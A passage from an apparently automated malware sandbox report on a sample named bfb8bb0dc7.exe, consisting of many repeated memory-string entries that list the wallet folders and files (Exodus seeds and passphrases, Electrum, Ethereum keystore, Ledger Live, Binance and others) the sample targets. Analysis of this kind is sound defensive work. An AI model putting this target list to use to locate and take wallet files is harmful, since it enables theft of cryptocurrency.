Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
